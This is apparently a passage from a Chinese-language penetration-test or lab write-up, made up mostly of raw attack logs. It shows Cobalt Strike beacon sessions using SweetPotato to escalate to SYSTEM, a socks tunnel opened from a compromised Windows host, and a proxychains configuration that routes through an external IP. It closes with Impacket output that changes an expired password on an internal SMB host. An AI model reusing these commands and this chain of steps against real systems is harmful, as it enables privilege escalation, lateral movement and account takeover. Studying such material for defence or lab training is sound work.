[11/01 15:56:43] [+] received output: nt service\mssqlserver
而你用甜土豆运行的话,你就可以通过甜土豆提权得到system权限
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
[11/01 16:06:42] beacon> shell C:\Users\Public\SweetPotato.exe -a C:\Users\Public\beacon.exe [11/01 16:06:42] [*] Tasked beacon to run: C:\Users\Public\SweetPotato.exe -a C:\Users\Public\beacon.exe [11/01 16:06:42] [+] host called home, sent: 92 bytes [11/01 16:06:53] [+] received output: Modifying SweetPotato by Uknow to support webshell Github: https://github.com/uknowsec/SweetPotato SweetPotato by @_EthicalChaos_ Orignal RottenPotato code and exploit by @foxglovesec Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery PrintSpoofer discovery and original exploit by @itm4n [+] Attempting NP impersonation using method PrintSpoofer to launch c:\Windows\System32\cmd.exe [+] Triggering notification on evil PIPE \\WIN-WEB/pipe/ce313253-509c-4737-9068-eb543f8a4637 [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] CreatePipe success [+] Command : "c:\Windows\System32\cmd.exe" /c C:\Users\Public\beacon.exe [+] process with pid: 5984 created.
同时也成功上线了有system权限的CS
1 2 3 4 5
[11/01 16:08:50] beacon> shell whoami [11/01 16:08:50] [*] Tasked beacon to run: whoami [11/01 16:08:50] [+] host called home, sent: 37 bytes [11/01 16:08:50] [+] received output: nt authority\system
[11/01 16:44:59] beacon> shell net use [11/01 16:44:59] [*] Tasked beacon to run: net use [11/01 16:44:59] [+] host called home, sent: 38 bytes [11/01 16:44:59] [+] received output: 会记录新的网络连接。
状态 本地 远程 网络
------------------------------------------------------------------------------- \\TSCLIENT\C Microsoft Terminal Services 命令成功完成。
(admin) >> use 0 (node 0) >> socks 1123 [*] Trying to listen on 0.0.0.0:1123...... [*] Waiting for agent's response...... [*] Socks start successfully! (node 0) >> shell [*] Waiting for response..... Microsoft Windows [°汾 10.0.14393] (c) 2016 Microsoft Corporation¡£±£´̹ԐȨ{¡£ C:\Windows\system32>cd .. cd .. C:\Windows>cd .. cd .. C:\>cd users cd users C:\Users>cd public cd public
┌──(root㉿kali)-[/home/kali] └─# cat /etc/proxychains4.conf # proxychains.conf VER 4.x # # HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.
# The option below identifies how the ProxyList is treated. # only one option should be uncommented at time, # otherwise the last appearing option will be accepted # #dynamic_chain # # Dynamic - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped) # otherwise EINTR is returned to the app # strict_chain # # Strict - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # all proxies must be online to play in chain # otherwise EINTR is returned to the app # #round_robin_chain # # Round Robin - Each connection will be done via chained proxies # of chain_len length # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped). # the start of the current proxy chain is the proxy after the last # proxy in the previously invoked proxy chain. # if the end of the proxy chain is reached while looking for proxies # start at the beginning again. # otherwise EINTR is returned to the app # These semantics are not guaranteed in a multithreaded environment. # #random_chain # # Random - Each connection will be done via random proxy # (or proxy chain, see chain_len) from the list. # this option is good to test your IDS :)
# Make sense only if random_chain or round_robin_chain #chain_len = 2
# Quiet mode (no output from library) #quiet_mode
## Proxy DNS requests - no leak for DNS data # (disable all of the 3 items below to not proxy your DNS requests)
# method 1. this uses the proxychains4 style method to do remote dns: # a thread is spawned that serves DNS requests and hands down an ip # assigned from an internal list (via remote_dns_subnet). # this is the easiest (setup-wise) and fastest method, however on # systems with buggy libcs and very complex software like webbrowsers # this might not work and/or cause crashes. proxy_dns
# method 2. use the old proxyresolv script to proxy DNS requests # in proxychains 3.1 style. requires `proxyresolv` in $PATH # plus a dynamically linked `dig` binary. # this is a lot slower than `proxy_dns`, doesn't support .onion URLs, # but might be more compatible with complex software like webbrowsers. #proxy_dns_old
# method 3. use proxychains4-daemon process to serve remote DNS requests. # this is similar to the threaded `proxy_dns` method, however it requires # that proxychains4-daemon is already running on the specified address. # on the plus side it doesn't do malloc/threads so it should be quite # compatible with complex, async-unsafe software. # note that if you don't start proxychains4-daemon before using this, # the process will simply hang. #proxy_dns_daemon 127.0.0.1:1053
# set the class A subnet number to use for the internal remote DNS mapping # we use the reserved 224.x.x.x range by default, # if the proxified app does a DNS request, we will return an IP from that range. # on further accesses to this ip we will send the saved DNS name to the proxy. # in case some control-freak app checks the returned ip, and denies to # connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x. # of course you should make sure that the proxified app does not need # *real* access to this subnet. # i.e. dont use the same subnet then in the localnet section #remote_dns_subnet 127 #remote_dns_subnet 10 remote_dns_subnet 224
# Some timeouts in milliseconds tcp_read_time_out 15000 tcp_connect_time_out 8000
### Examples for localnet exclusion ## localnet ranges will *not* use a proxy to connect. ## note that localnet works only when plain IP addresses are passed to the app, ## the hostname resolves via /etc/hosts, or proxy_dns is disabled or proxy_dns_old used.
## Exclude connections to 192.168.1.0/24 with port 80 # localnet 192.168.1.0:80/255.255.255.0
## Exclude connections to 192.168.100.0/24 # localnet 192.168.100.0/255.255.255.0
## Exclude connections to ANYwhere with port 80 # localnet 0.0.0.0:80/0.0.0.0 # localnet [::]:80/0
## RFC6890 Loopback address range ## if you enable this, you have to make sure remote_dns_subnet is not 127 ## you'll need to enable it if you want to use an application that ## connects to localhost. # localnet 127.0.0.0/255.0.0.0 # localnet ::1/128
### Examples for dnat ## Trying to proxy connections to destinations which are dnatted, ## will result in proxying connections to the new given destinations. ## Whenever I connect to 1.1.1.1 on port 1234 actually connect to 1.1.1.2 on port 443 # dnat 1.1.1.1:1234 1.1.1.2:443
## Whenever I connect to 1.1.1.1 on port 443 actually connect to 1.1.1.2 on port 443 ## (no need to write :443 again) # dnat 1.1.1.2:443 1.1.1.2
## No matter what port I connect to on 1.1.1.1 port actually connect to 1.1.1.2 on port 443 # dnat 1.1.1.1 1.1.1.2:443
## Always, instead of connecting to 1.1.1.1, connect to 1.1.1.2 # dnat 1.1.1.1 1.1.1.2
# ProxyList format # type ip port [user pass] # (values separated by 'tab' or 'blank') # # only numeric ipv4 addresses are valid # # # Examples: # # socks5 192.168.67.78 1080 lamer secret # http 192.168.89.3 8080 justu hidden # socks4 192.168.1.49 1080 # http 192.168.39.93 8080 # # # proxy types: http, socks4, socks5, raw # * raw: The traffic is simply forwarded to the proxy without modification. # ( auth types supported: "basic"-http "user/pass"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 38.55.99.185 1123
=============================================================================== Warning: This functionality will be deprecated in the next Impacket version ===============================================================================
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.8.15:445 ... OK [!] Password is expired, trying to bind with a null session. [proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.8.15:445 ... OK [*] Password was changed successfully.
